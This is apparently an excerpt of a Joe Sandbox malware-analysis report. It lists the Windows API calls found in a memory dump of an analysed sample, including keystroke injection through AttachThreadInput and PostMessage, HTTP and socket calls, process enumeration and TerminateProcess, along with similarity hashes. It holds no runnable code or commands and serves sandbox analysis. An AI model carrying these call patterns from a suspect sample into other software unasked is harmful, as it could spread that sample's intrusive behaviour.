                                                                                                                                                                              • Snapshot File: hcaresult_4_2_4b0000_UNK_.jbxd
                                                                                                                                                                              Similarity
                                                                                                                                                                              • API ID: Error$Mode$DiskFreeLastSpace
                                                                                                                                                                              • String ID: INVALID$NOTREADY$READONLY$READY$UNKNOWN
                                                                                                                                                                              • API String ID: 4194297153-14809454
                                                                                                                                                                              APIs
                                                                                                                                                                                • Part of subcall function 004BCAEE: _memmove.LIBCMT ref: 004BCB2F
                                                                                                                                                                              • SendMessageW.USER32(?,0000018C,000000FF,00000002), ref: 004EC782
                                                                                                                                                                              • GetDlgCtrlID.USER32 ref: 004EC78D
                                                                                                                                                                              • GetParent.USER32 ref: 004EC7A9
                                                                                                                                                                              • SendMessageW.USER32(00000000,?,00000111,?), ref: 004EC7AC
                                                                                                                                                                              • GetDlgCtrlID.USER32(?), ref: 004EC7B5
                                                                                                                                                                              • GetParent.USER32(?), ref: 004EC7D1
                                                                                                                                                                              • SendMessageW.USER32(00000000,?,?,00000111), ref: 004EC7D4
                                                                                                                                                                              Strings
                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                              • Source File: 00000004.00000002.2718127458.00000000004B1000.00000020.00000001.01000000.00000008.sdmp, Offset: 004B0000, based on PE: true
                                                                                                                                                                              • Associated: 00000004.00000002.2717940174.00000000004B0000.00000002.00000001.01000000.00000008.sdmp
                                                                                                                                                                              • Associated: 00000004.00000002.2718647184.000000000053D000.00000002.00000001.01000000.00000008.sdmp
                                                                                                                                                                              • Associated: 00000004.00000002.2718647184.000000000055E000.00000002.00000001.01000000.00000008.sdmp
                                                                                                                                                                              • Associated: 00000004.00000002.2719237589.000000000056A000.00000004.00000001.01000000.00000008.sdmp
                                                                                                                                                                              • Associated: 00000004.00000002.2719429623.0000000000574000.00000002.00000001.01000000.00000008.sdmp
                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                              • Snapshot File: hcaresult_4_2_4b0000_UNK_.jbxd
                                                                                                                                                                              Similarity
                                                                                                                                                                              • API ID: MessageSend$CtrlParent$_memmove
                                                                                                                                                                              • String ID: ComboBox$ListBox
                                                                                                                                                                              • API String ID: 313823418-1403004172
                                                                                                                                                                              APIs
                                                                                                                                                                                • Part of subcall function 004BCAEE: _memmove.LIBCMT ref: 004BCB2F
                                                                                                                                                                              • SendMessageW.USER32(?,00000186,00000002,00000000), ref: 004EC869
                                                                                                                                                                              • GetDlgCtrlID.USER32 ref: 004EC874
                                                                                                                                                                              • GetParent.USER32 ref: 004EC890
                                                                                                                                                                              • SendMessageW.USER32(00000000,?,00000111,?), ref: 004EC893
                                                                                                                                                                              • GetDlgCtrlID.USER32(?), ref: 004EC89C
                                                                                                                                                                              • GetParent.USER32(?), ref: 004EC8B8
                                                                                                                                                                              • SendMessageW.USER32(00000000,?,?,00000111), ref: 004EC8BB
                                                                                                                                                                              Strings
                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                              • Source File: 00000004.00000002.2718127458.00000000004B1000.00000020.00000001.01000000.00000008.sdmp, Offset: 004B0000, based on PE: true
                                                                                                                                                                              • Associated: 00000004.00000002.2717940174.00000000004B0000.00000002.00000001.01000000.00000008.sdmp
                                                                                                                                                                              • Associated: 00000004.00000002.2718647184.000000000053D000.00000002.00000001.01000000.00000008.sdmp
                                                                                                                                                                              • Associated: 00000004.00000002.2718647184.000000000055E000.00000002.00000001.01000000.00000008.sdmp
                                                                                                                                                                              • Associated: 00000004.00000002.2719237589.000000000056A000.00000004.00000001.01000000.00000008.sdmp
                                                                                                                                                                              • Associated: 00000004.00000002.2719429623.0000000000574000.00000002.00000001.01000000.00000008.sdmp
                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                              • Snapshot File: hcaresult_4_2_4b0000_UNK_.jbxd
                                                                                                                                                                              Similarity
                                                                                                                                                                              • API ID: MessageSend$CtrlParent$_memmove
                                                                                                                                                                              • String ID: ComboBox$ListBox
                                                                                                                                                                              • API String ID: 313823418-1403004172
                                                                                                                                                                              APIs
                                                                                                                                                                              • GetParent.USER32 ref: 004EC8D9
                                                                                                                                                                              • GetClassNameW.USER32(00000000,?,00000100), ref: 004EC8EE
                                                                                                                                                                              • _wcscmp.LIBCMT ref: 004EC900
                                                                                                                                                                              • SendMessageW.USER32(00000000,00000111,0000702B,00000000), ref: 004EC97B
                                                                                                                                                                              Strings
                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                              • Source File: 00000004.00000002.2718127458.00000000004B1000.00000020.00000001.01000000.00000008.sdmp, Offset: 004B0000, based on PE: true
                                                                                                                                                                              • Associated: 00000004.00000002.2717940174.00000000004B0000.00000002.00000001.01000000.00000008.sdmp
                                                                                                                                                                              • Associated: 00000004.00000002.2718647184.000000000053D000.00000002.00000001.01000000.00000008.sdmp
                                                                                                                                                                              • Associated: 00000004.00000002.2718647184.000000000055E000.00000002.00000001.01000000.00000008.sdmp
                                                                                                                                                                              • Associated: 00000004.00000002.2719237589.000000000056A000.00000004.00000001.01000000.00000008.sdmp
                                                                                                                                                                              • Associated: 00000004.00000002.2719429623.0000000000574000.00000002.00000001.01000000.00000008.sdmp
                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                              • Snapshot File: hcaresult_4_2_4b0000_UNK_.jbxd
                                                                                                                                                                              Similarity
                                                                                                                                                                              • API ID: ClassMessageNameParentSend_wcscmp
                                                                                                                                                                              • String ID: SHELLDLL_DefView$details$largeicons$list$smallicons
                                                                                                                                                                              • API String ID: 1704125052-3381328864
                                                                                                                                                                              APIs
                                                                                                                                                                              • SafeArrayGetVartype.OLEAUT32(?,00000000), ref: 004FB137
                                                                                                                                                                              Similarity
                                                                                                                                                                              • API ID: ArraySafeVartype
                                                                                                                                                                              • String ID:
                                                                                                                                                                              • API String ID: 1725837607-0
                                                                                                                                                                              APIs
                                                                                                                                                                              • GetCurrentThreadId.KERNEL32 ref: 004F4A7D
                                                                                                                                                                              • GetForegroundWindow.USER32(00000000,?,?,?,?,?,004F3AD7,?,00000001), ref: 004F4A91
                                                                                                                                                                              • GetWindowThreadProcessId.USER32(00000000), ref: 004F4A98
                                                                                                                                                                              • AttachThreadInput.USER32(00000000,00000000,00000001,?,?,?,?,?,004F3AD7,?,00000001), ref: 004F4AA7
                                                                                                                                                                              • GetWindowThreadProcessId.USER32(?,00000000), ref: 004F4AB9
                                                                                                                                                                              • AttachThreadInput.USER32(?,00000000,00000001,?,?,?,?,?,004F3AD7,?,00000001), ref: 004F4AD2
                                                                                                                                                                              • AttachThreadInput.USER32(00000000,00000000,00000001,?,?,?,?,?,004F3AD7,?,00000001), ref: 004F4AE4
                                                                                                                                                                              • AttachThreadInput.USER32(00000000,00000000,?,?,?,?,?,004F3AD7,?,00000001), ref: 004F4B29
                                                                                                                                                                              • AttachThreadInput.USER32(?,?,00000000,?,?,?,?,?,004F3AD7,?,00000001), ref: 004F4B3E
                                                                                                                                                                              • AttachThreadInput.USER32(00000000,?,00000000,?,?,?,?,?,004F3AD7,?,00000001), ref: 004F4B49
                                                                                                                                                                              Similarity
                                                                                                                                                                              • API ID: Thread$AttachInput$Window$Process$CurrentForeground
                                                                                                                                                                              • String ID:
                                                                                                                                                                              • API String ID: 2156557900-0
                                                                                                                                                                              APIs
                                                                                                                                                                              • GetClientRect.USER32(?), ref: 0052EC32
                                                                                                                                                                              • SendMessageW.USER32(?,00001328,00000000,?), ref: 0052EC49
                                                                                                                                                                              • GetWindowDC.USER32(?), ref: 0052EC55
                                                                                                                                                                              • GetPixel.GDI32(00000000,?,?), ref: 0052EC64
                                                                                                                                                                              • ReleaseDC.USER32(?,00000000), ref: 0052EC76
                                                                                                                                                                              • GetSysColor.USER32(00000005), ref: 0052EC94
                                                                                                                                                                              Similarity
                                                                                                                                                                              • API ID: ClientColorMessagePixelRectReleaseSendWindow
                                                                                                                                                                              • String ID:
                                                                                                                                                                              • API String ID: 272304278-0
                                                                                                                                                                              APIs
                                                                                                                                                                              • EnumChildWindows.USER32(?,004EDD46), ref: 004EDC86
                                                                                                                                                                              Strings
                                                                                                                                                                              Similarity
                                                                                                                                                                              • API ID: ChildEnumWindows
                                                                                                                                                                              • String ID: CLASS$CLASSNN$INSTANCE$NAME$REGEXPCLASS$TEXT
                                                                                                                                                                              • API String ID: 3555792229-1603158881
                                                                                                                                                                              APIs
                                                                                                                                                                              • mciSendStringW.WINMM(close all,00000000,00000000,00000000), ref: 004B45F0
                                                                                                                                                                              • CoUninitialize.OLE32(?,00000000), ref: 004B4695
                                                                                                                                                                              • UnregisterHotKey.USER32(?), ref: 004B47BD
                                                                                                                                                                              • DestroyWindow.USER32(?), ref: 00525936
                                                                                                                                                                              • FreeLibrary.KERNEL32(?), ref: 0052599D
                                                                                                                                                                              • VirtualFree.KERNEL32(?,00000000,00008000), ref: 005259CA
                                                                                                                                                                              Strings
                                                                                                                                                                              Similarity
                                                                                                                                                                              • API ID: Free$DestroyLibrarySendStringUninitializeUnregisterVirtualWindow
                                                                                                                                                                              • String ID: close all
                                                                                                                                                                              • API String ID: 469580280-3243417748
                                                                                                                                                                              APIs
                                                                                                                                                                              • SetWindowLongW.USER32(?,000000EB), ref: 004CC2D2
                                                                                                                                                                                • Part of subcall function 004CC697: GetClientRect.USER32(?,?), ref: 004CC6C0
                                                                                                                                                                                • Part of subcall function 004CC697: GetWindowRect.USER32(?,?), ref: 004CC701
                                                                                                                                                                                • Part of subcall function 004CC697: ScreenToClient.USER32(?,?), ref: 004CC729
                                                                                                                                                                              • GetDC.USER32 ref: 0052E006
                                                                                                                                                                              • SendMessageW.USER32(?,00000031,00000000,00000000), ref: 0052E019
                                                                                                                                                                              • SelectObject.GDI32(00000000,00000000), ref: 0052E027
                                                                                                                                                                              • SelectObject.GDI32(00000000,00000000), ref: 0052E03C
                                                                                                                                                                              • ReleaseDC.USER32(?,00000000), ref: 0052E044
                                                                                                                                                                              • MoveWindow.USER32(?,?,?,?,?,?,?,00000031,00000000,00000000), ref: 0052E0CF
                                                                                                                                                                              Strings
                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                              • Source File: 00000004.00000002.2718127458.00000000004B1000.00000020.00000001.01000000.00000008.sdmp, Offset: 004B0000, based on PE: true
                                                                                                                                                                              • Associated: 00000004.00000002.2717940174.00000000004B0000.00000002.00000001.01000000.00000008.sdmp
                                                                                                                                                                              • Associated: 00000004.00000002.2718647184.000000000053D000.00000002.00000001.01000000.00000008.sdmp
                                                                                                                                                                              • Associated: 00000004.00000002.2718647184.000000000055E000.00000002.00000001.01000000.00000008.sdmp
                                                                                                                                                                              • Associated: 00000004.00000002.2719237589.000000000056A000.00000004.00000001.01000000.00000008.sdmp
                                                                                                                                                                              • Associated: 00000004.00000002.2719429623.0000000000574000.00000002.00000001.01000000.00000008.sdmp
                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                              • Snapshot File: hcaresult_4_2_4b0000_UNK_.jbxd
                                                                                                                                                                              Similarity
                                                                                                                                                                              • API ID: Window$ClientObjectRectSelect$LongMessageMoveReleaseScreenSend
                                                                                                                                                                              • String ID: U
                                                                                                                                                                              • API String ID: 4009187628-3372436214
                                                                                                                                                                              APIs
                                                                                                                                                                                • Part of subcall function 004CAF7D: GetWindowLongW.USER32(?,000000EB), ref: 004CAF8E
                                                                                                                                                                                • Part of subcall function 004CB736: GetCursorPos.USER32(000000FF), ref: 004CB749
                                                                                                                                                                                • Part of subcall function 004CB736: ScreenToClient.USER32(00000000,000000FF), ref: 004CB766
                                                                                                                                                                                • Part of subcall function 004CB736: GetAsyncKeyState.USER32(00000001), ref: 004CB78B
                                                                                                                                                                                • Part of subcall function 004CB736: GetAsyncKeyState.USER32(00000002), ref: 004CB799
                                                                                                                                                                              • ImageList_DragLeave.COMCTL32(00000000,00000000,00000001,?,?,?), ref: 0051EB0E
                                                                                                                                                                              • ImageList_EndDrag.COMCTL32 ref: 0051EB14
                                                                                                                                                                              • ReleaseCapture.USER32 ref: 0051EB1A
                                                                                                                                                                              • SetWindowTextW.USER32(?,00000000), ref: 0051EBC2
                                                                                                                                                                              • SendMessageW.USER32(?,000000B1,00000000,000000FF), ref: 0051EBD5
                                                                                                                                                                              • DefDlgProcW.USER32(?,00000202,?,?,00000000,00000001,?,?,?), ref: 0051ECAE
                                                                                                                                                                              Strings
                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                              • Source File: 00000004.00000002.2718127458.00000000004B1000.00000020.00000001.01000000.00000008.sdmp, Offset: 004B0000, based on PE: true
                                                                                                                                                                              • Associated: 00000004.00000002.2717940174.00000000004B0000.00000002.00000001.01000000.00000008.sdmp
                                                                                                                                                                              • Associated: 00000004.00000002.2718647184.000000000053D000.00000002.00000001.01000000.00000008.sdmp
                                                                                                                                                                              • Associated: 00000004.00000002.2718647184.000000000055E000.00000002.00000001.01000000.00000008.sdmp
                                                                                                                                                                              • Associated: 00000004.00000002.2719237589.000000000056A000.00000004.00000001.01000000.00000008.sdmp
                                                                                                                                                                              • Associated: 00000004.00000002.2719429623.0000000000574000.00000002.00000001.01000000.00000008.sdmp
                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                              • Snapshot File: hcaresult_4_2_4b0000_UNK_.jbxd
                                                                                                                                                                              Similarity
                                                                                                                                                                              • API ID: AsyncDragImageList_StateWindow$CaptureClientCursorLeaveLongMessageProcReleaseScreenSendText
                                                                                                                                                                              • String ID: @GUI_DRAGFILE$@GUI_DROPID
                                                                                                                                                                              • API String ID: 1924731296-2107944366
                                                                                                                                                                              APIs
                                                                                                                                                                              • InternetConnectW.WININET(?,?,?,?,?,?,00000000,00000000), ref: 00504C5E
                                                                                                                                                                              • HttpOpenRequestW.WININET(00000000,00000000,?,00000000,00000000,00000000,?,00000000), ref: 00504C8A
                                                                                                                                                                              • InternetQueryOptionW.WININET(00000000,0000001F,00000000,?), ref: 00504CCC
                                                                                                                                                                              • InternetSetOptionW.WININET(00000000,0000001F,00000100,00000004), ref: 00504CE1
                                                                                                                                                                              • HttpSendRequestW.WININET(00000000,00000000,00000000,00000000,00000000), ref: 00504CEE
                                                                                                                                                                              • HttpQueryInfoW.WININET(00000000,00000005,?,?,00000000), ref: 00504D1E
                                                                                                                                                                              • InternetCloseHandle.WININET(00000000), ref: 00504D65
                                                                                                                                                                                • Part of subcall function 005056A9: GetLastError.KERNEL32(?,?,00504A2B,00000000,00000000,00000001), ref: 005056BE
                                                                                                                                                                              Strings
                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                              • Source File: 00000004.00000002.2718127458.00000000004B1000.00000020.00000001.01000000.00000008.sdmp, Offset: 004B0000, based on PE: true
                                                                                                                                                                              • Associated: 00000004.00000002.2717940174.00000000004B0000.00000002.00000001.01000000.00000008.sdmp
                                                                                                                                                                              • Associated: 00000004.00000002.2718647184.000000000053D000.00000002.00000001.01000000.00000008.sdmp
                                                                                                                                                                              • Associated: 00000004.00000002.2718647184.000000000055E000.00000002.00000001.01000000.00000008.sdmp
                                                                                                                                                                              • Associated: 00000004.00000002.2719237589.000000000056A000.00000004.00000001.01000000.00000008.sdmp
                                                                                                                                                                              • Associated: 00000004.00000002.2719429623.0000000000574000.00000002.00000001.01000000.00000008.sdmp
                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                              • Snapshot File: hcaresult_4_2_4b0000_UNK_.jbxd
                                                                                                                                                                              Similarity
                                                                                                                                                                              • API ID: Internet$Http$OptionQueryRequest$CloseConnectErrorHandleInfoLastOpenSend
                                                                                                                                                                              • String ID:
                                                                                                                                                                              • API String ID: 1241431887-3916222277
                                                                                                                                                                              APIs
                                                                                                                                                                              • GetModuleFileNameW.KERNEL32(?,?,00000104,?,0054DBF0), ref: 0050BBA1
                                                                                                                                                                              • FreeLibrary.KERNEL32(00000000,00000001,00000000,?,0054DBF0), ref: 0050BBD5
                                                                                                                                                                              • QueryPathOfRegTypeLib.OLEAUT32(?,?,?,?,?), ref: 0050BD33
                                                                                                                                                                              • SysFreeString.OLEAUT32(?), ref: 0050BD5D
                                                                                                                                                                              • StringFromGUID2.OLE32(?,?,00000028,?,0054DBF0), ref: 0050BEAD
                                                                                                                                                                              • ProgIDFromCLSID.OLE32(?,?,?,0054DBF0), ref: 0050BEF7
                                                                                                                                                                              • CoTaskMemFree.OLE32(?,?,?,0054DBF0), ref: 0050BF14
                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                              • Source File: 00000004.00000002.2718127458.00000000004B1000.00000020.00000001.01000000.00000008.sdmp, Offset: 004B0000, based on PE: true
                                                                                                                                                                              • Associated: 00000004.00000002.2717940174.00000000004B0000.00000002.00000001.01000000.00000008.sdmp
                                                                                                                                                                              • Associated: 00000004.00000002.2718647184.000000000053D000.00000002.00000001.01000000.00000008.sdmp
                                                                                                                                                                              • Associated: 00000004.00000002.2718647184.000000000055E000.00000002.00000001.01000000.00000008.sdmp
                                                                                                                                                                              • Associated: 00000004.00000002.2719237589.000000000056A000.00000004.00000001.01000000.00000008.sdmp
                                                                                                                                                                              • Associated: 00000004.00000002.2719429623.0000000000574000.00000002.00000001.01000000.00000008.sdmp
                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                              • Snapshot File: hcaresult_4_2_4b0000_UNK_.jbxd
                                                                                                                                                                              Similarity
                                                                                                                                                                              • API ID: Free$FromString$FileLibraryModuleNamePathProgQueryTaskType
                                                                                                                                                                              • String ID:
                                                                                                                                                                              • API String ID: 793797124-0
                                                                                                                                                                              APIs
                                                                                                                                                                              • select.WSOCK32 ref: 00509B38
                                                                                                                                                                              • WSAGetLastError.WSOCK32(00000000), ref: 00509B45
                                                                                                                                                                              • __WSAFDIsSet.WSOCK32(00000000,?,00000000), ref: 00509B6F
                                                                                                                                                                              • #17.WSOCK32(00000000,?,?,00000000,?,00000010), ref: 00509B90
                                                                                                                                                                              • WSAGetLastError.WSOCK32(00000000), ref: 00509B9F
                                                                                                                                                                              • htons.WSOCK32(?,?,?,00000000,?), ref: 00509C51
                                                                                                                                                                              • inet_ntoa.WSOCK32(?,?,?,?,?,?,?,?,?,?,?,?,0054DBF0), ref: 00509C0C
                                                                                                                                                                                • Part of subcall function 004EE0F5: _strlen.LIBCMT ref: 004EE0FF
                                                                                                                                                                                • Part of subcall function 004EE0F5: _memmove.LIBCMT ref: 004EE121
                                                                                                                                                                              • _strlen.LIBCMT ref: 00509CA7
                                                                                                                                                                              • _memmove.LIBCMT ref: 00509D10
                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                              • Source File: 00000004.00000002.2718127458.00000000004B1000.00000020.00000001.01000000.00000008.sdmp, Offset: 004B0000, based on PE: true
                                                                                                                                                                              • Associated: 00000004.00000002.2717940174.00000000004B0000.00000002.00000001.01000000.00000008.sdmp
                                                                                                                                                                              • Associated: 00000004.00000002.2718647184.000000000053D000.00000002.00000001.01000000.00000008.sdmp
                                                                                                                                                                              • Associated: 00000004.00000002.2718647184.000000000055E000.00000002.00000001.01000000.00000008.sdmp
                                                                                                                                                                              • Associated: 00000004.00000002.2719237589.000000000056A000.00000004.00000001.01000000.00000008.sdmp
                                                                                                                                                                              • Associated: 00000004.00000002.2719429623.0000000000574000.00000002.00000001.01000000.00000008.sdmp
                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                              • Snapshot File: hcaresult_4_2_4b0000_UNK_.jbxd
                                                                                                                                                                              Similarity
                                                                                                                                                                              • API ID: ErrorLast_memmove_strlen$htonsinet_ntoaselect
                                                                                                                                                                              • String ID:
                                                                                                                                                                              • API String ID: 3637404534-0
                                                                                                                                                                              APIs
                                                                                                                                                                              • InvalidateRect.USER32(?,00000000,00000001,?,00000001), ref: 0051B204
                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                              • Source File: 00000004.00000002.2718127458.00000000004B1000.00000020.00000001.01000000.00000008.sdmp, Offset: 004B0000, based on PE: true
                                                                                                                                                                              Similarity
                                                                                                                                                                              • API ID: InvalidateRect
                                                                                                                                                                              • String ID:
                                                                                                                                                                              • API String ID: 634782764-0
                                                                                                                                                                              APIs
                                                                                                                                                                              • LoadImageW.USER32(00000000,?,00000001,00000010,00000010,00000010), ref: 0052E9EA
                                                                                                                                                                              • ExtractIconExW.SHELL32(?,00000000,00000000,00000000,00000001), ref: 0052EA0B
                                                                                                                                                                              • LoadImageW.USER32(00000000,?,00000001,00000000,00000000,00000050), ref: 0052EA20
                                                                                                                                                                              • ExtractIconExW.SHELL32(?,00000000,?,00000000,00000001), ref: 0052EA3D
                                                                                                                                                                              • SendMessageW.USER32(00000000,00000080,00000000,00000000), ref: 0052EA64
                                                                                                                                                                              • DestroyIcon.USER32(00000000,?,?,?,?,?,?,004CA57C,00000000,00000000,00000000,000000FF,00000000,000000FF,000000FF), ref: 0052EA6F
                                                                                                                                                                              • SendMessageW.USER32(00000000,00000080,00000001,00000000), ref: 0052EA8C
                                                                                                                                                                              • DestroyIcon.USER32(00000000,?,?,?,?,?,?,004CA57C,00000000,00000000,00000000,000000FF,00000000,000000FF,000000FF), ref: 0052EA97
                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                              • Source File: 00000004.00000002.2718127458.00000000004B1000.00000020.00000001.01000000.00000008.sdmp, Offset: 004B0000, based on PE: true
                                                                                                                                                                              Similarity
                                                                                                                                                                              • API ID: Icon$DestroyExtractImageLoadMessageSend
                                                                                                                                                                              • String ID:
                                                                                                                                                                              • API String ID: 1268354404-0
                                                                                                                                                                              APIs
                                                                                                                                                                              • ShowWindow.USER32(00000000,000000FF,00000000,00000000,00000000,?,0052E9A0,00000004,00000000,00000000), ref: 004CF737
                                                                                                                                                                              • ShowWindow.USER32(00000000,00000000,00000000,00000000,00000000,?,0052E9A0,00000004,00000000,00000000), ref: 004CF77E
                                                                                                                                                                              • ShowWindow.USER32(00000000,00000006,00000000,00000000,00000000,?,0052E9A0,00000004,00000000,00000000), ref: 0052EB55
                                                                                                                                                                              • ShowWindow.USER32(00000000,000000FF,00000000,00000000,00000000,?,0052E9A0,00000004,00000000,00000000), ref: 0052EBC1
                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                              • Source File: 00000004.00000002.2718127458.00000000004B1000.00000020.00000001.01000000.00000008.sdmp, Offset: 004B0000, based on PE: true
                                                                                                                                                                              Similarity
                                                                                                                                                                              • API ID: ShowWindow
                                                                                                                                                                              • String ID:
                                                                                                                                                                              • API String ID: 1268545403-0
                                                                                                                                                                              APIs
                                                                                                                                                                                • Part of subcall function 004EE138: GetWindowThreadProcessId.USER32(?,00000000), ref: 004EE158
                                                                                                                                                                                • Part of subcall function 004EE138: GetCurrentThreadId.KERNEL32 ref: 004EE15F
                                                                                                                                                                                • Part of subcall function 004EE138: AttachThreadInput.USER32(00000000,?,004ECDFB,?,00000001), ref: 004EE166
                                                                                                                                                                              • MapVirtualKeyW.USER32(00000025,00000000), ref: 004ECE06
                                                                                                                                                                              • PostMessageW.USER32(?,00000100,00000025,00000000), ref: 004ECE23
                                                                                                                                                                              • Sleep.KERNEL32(00000000,?,00000100,00000025,00000000,?,00000001), ref: 004ECE26
                                                                                                                                                                              • MapVirtualKeyW.USER32(00000025,00000000), ref: 004ECE2F
                                                                                                                                                                              • PostMessageW.USER32(?,00000100,00000027,00000000), ref: 004ECE4D
                                                                                                                                                                              • Sleep.KERNEL32(00000000,?,00000100,00000027,00000000,?,00000001), ref: 004ECE50
                                                                                                                                                                              • MapVirtualKeyW.USER32(00000025,00000000), ref: 004ECE59
                                                                                                                                                                              • PostMessageW.USER32(?,00000101,00000027,00000000), ref: 004ECE70
                                                                                                                                                                              • Sleep.KERNEL32(00000000,?,00000100,00000027,00000000,?,00000001), ref: 004ECE73
                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                              • Source File: 00000004.00000002.2718127458.00000000004B1000.00000020.00000001.01000000.00000008.sdmp, Offset: 004B0000, based on PE: true
                                                                                                                                                                              Similarity
                                                                                                                                                                              • API ID: MessagePostSleepThreadVirtual$AttachCurrentInputProcessWindow
                                                                                                                                                                              • String ID:
                                                                                                                                                                              • API String ID: 2014098862-0
                                                                                                                                                                              APIs
                                                                                                                                                                                • Part of subcall function 004B84A6: __swprintf.LIBCMT ref: 004B84E5
                                                                                                                                                                                • Part of subcall function 004B84A6: __itow.LIBCMT ref: 004B8519
                                                                                                                                                                                • Part of subcall function 004B3BCF: _wcscpy.LIBCMT ref: 004B3BF2
                                                                                                                                                                              • _wcstok.LIBCMT ref: 00501D6E
                                                                                                                                                                              • _wcscpy.LIBCMT ref: 00501DFD
                                                                                                                                                                              • _memset.LIBCMT ref: 00501E30
                                                                                                                                                                              Strings
                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                              • Source File: 00000004.00000002.2718127458.00000000004B1000.00000020.00000001.01000000.00000008.sdmp, Offset: 004B0000, based on PE: true
                                                                                                                                                                              Similarity
                                                                                                                                                                              • API ID: _wcscpy$__itow__swprintf_memset_wcstok
                                                                                                                                                                              • String ID: X$t:Vp:V
                                                                                                                                                                              • API String ID: 774024439-3188185075
                                                                                                                                                                              APIs
                                                                                                                                                                                • Part of subcall function 004EA857: CLSIDFromProgID.OLE32 ref: 004EA874
                                                                                                                                                                                • Part of subcall function 004EA857: ProgIDFromCLSID.OLE32(?,00000000), ref: 004EA88F
                                                                                                                                                                                • Part of subcall function 004EA857: lstrcmpiW.KERNEL32(?,00000000), ref: 004EA89D
                                                                                                                                                                                • Part of subcall function 004EA857: CoTaskMemFree.OLE32(00000000,?,00000000), ref: 004EA8AD
                                                                                                                                                                              • CoInitializeSecurity.OLE32(00000000,000000FF,00000000,00000000,00000002,00000003,00000000,00000000,00000000,?,?,?), ref: 0050C6AD
                                                                                                                                                                              • _memset.LIBCMT ref: 0050C6BA
                                                                                                                                                                              • _memset.LIBCMT ref: 0050C7D8
                                                                                                                                                                              • CoCreateInstanceEx.OLE32(?,00000000,00000015,?,00000001,00000001), ref: 0050C804
                                                                                                                                                                              • CoTaskMemFree.OLE32(?), ref: 0050C80F
                                                                                                                                                                              Strings
                                                                                                                                                                              • NULL Pointer assignment, xrefs: 0050C85D
                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                              • Source File: 00000004.00000002.2718127458.00000000004B1000.00000020.00000001.01000000.00000008.sdmp, Offset: 004B0000, based on PE: true
                                                                                                                                                                              • Associated: 00000004.00000002.2717940174.00000000004B0000.00000002.00000001.01000000.00000008.sdmp
                                                                                                                                                                              • Associated: 00000004.00000002.2718647184.000000000053D000.00000002.00000001.01000000.00000008.sdmp
                                                                                                                                                                              • Associated: 00000004.00000002.2718647184.000000000055E000.00000002.00000001.01000000.00000008.sdmp
                                                                                                                                                                              • Associated: 00000004.00000002.2719237589.000000000056A000.00000004.00000001.01000000.00000008.sdmp
                                                                                                                                                                              • Associated: 00000004.00000002.2719429623.0000000000574000.00000002.00000001.01000000.00000008.sdmp
                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                              • Snapshot File: hcaresult_4_2_4b0000_UNK_.jbxd
                                                                                                                                                                              Similarity
                                                                                                                                                                              • API ID: FreeFromProgTask_memset$CreateInitializeInstanceSecuritylstrcmpi
                                                                                                                                                                              • String ID: NULL Pointer assignment
                                                                                                                                                                              • API String ID: 1300414916-2785691316
                                                                                                                                                                              APIs
                                                                                                                                                                              • CreateToolhelp32Snapshot.KERNEL32 ref: 00511B09
                                                                                                                                                                              • Process32FirstW.KERNEL32(00000000,?), ref: 00511B17
                                                                                                                                                                              • __wsplitpath.LIBCMT ref: 00511B45
                                                                                                                                                                                • Part of subcall function 004D297D: __wsplitpath_helper.LIBCMT ref: 004D29BD
                                                                                                                                                                              • _wcscat.LIBCMT ref: 00511B5A
                                                                                                                                                                              • Process32NextW.KERNEL32(00000000,?), ref: 00511BD0
                                                                                                                                                                              • CloseHandle.KERNEL32(00000000,?,?,00000002,00000000), ref: 00511BE2
                                                                                                                                                                              Strings
                                                                                                                                                                              Similarity
                                                                                                                                                                              • API ID: Process32$CloseCreateFirstHandleNextSnapshotToolhelp32__wsplitpath__wsplitpath_helper_wcscat
                                                                                                                                                                              • String ID: hEV
                                                                                                                                                                              • API String ID: 1380811348-3062041611
                                                                                                                                                                              APIs
                                                                                                                                                                              • SendMessageW.USER32(00000000,00001036,00000010,00000010), ref: 00519926
                                                                                                                                                                              • SendMessageW.USER32(?,00001036,00000000,?), ref: 0051993A
                                                                                                                                                                              • SetWindowPos.USER32(?,00000000,00000000,00000000,00000000,00000000,00000013), ref: 00519954
                                                                                                                                                                              • _wcscat.LIBCMT ref: 005199AF
                                                                                                                                                                              • SendMessageW.USER32(?,00001057,00000000,?), ref: 005199C6
                                                                                                                                                                              • SendMessageW.USER32(?,00001061,?,0000000F), ref: 005199F4
                                                                                                                                                                              Strings
                                                                                                                                                                              Similarity
                                                                                                                                                                              • API ID: MessageSend$Window_wcscat
                                                                                                                                                                              • String ID: SysListView32
                                                                                                                                                                              • API String ID: 307300125-78025650
                                                                                                                                                                              APIs
                                                                                                                                                                                • Part of subcall function 004F6F5B: CreateToolhelp32Snapshot.KERNEL32(00000002,00000000,?,00000000), ref: 004F6F7D
                                                                                                                                                                                • Part of subcall function 004F6F5B: Process32FirstW.KERNEL32(00000000,0000022C), ref: 004F6F8D
                                                                                                                                                                                • Part of subcall function 004F6F5B: CloseHandle.KERNEL32(00000000,?,00000000), ref: 004F7022
                                                                                                                                                                              • OpenProcess.KERNEL32(00000001,00000000,?), ref: 0051168B
                                                                                                                                                                              • GetLastError.KERNEL32 ref: 0051169E
                                                                                                                                                                              • OpenProcess.KERNEL32(00000001,00000000,?), ref: 005116CA
                                                                                                                                                                              • TerminateProcess.KERNEL32(00000000,00000000), ref: 00511746
